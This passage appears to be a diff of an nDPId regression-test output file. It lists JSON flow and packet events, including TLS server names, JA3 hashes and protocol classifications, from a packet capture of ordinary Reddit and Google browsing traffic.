{"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8UAAAAAoAL9IJAlAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} 
+00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684451,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684451,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605291684451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684451,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YUAAAAAoAL9INBoAAACBAWgBAIICtTdYAcAAAAAAQMDBw=="} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684452,"flow_last_seen":1605291684452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684452,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="} 
+00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="} +00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="} 
+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="} 
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 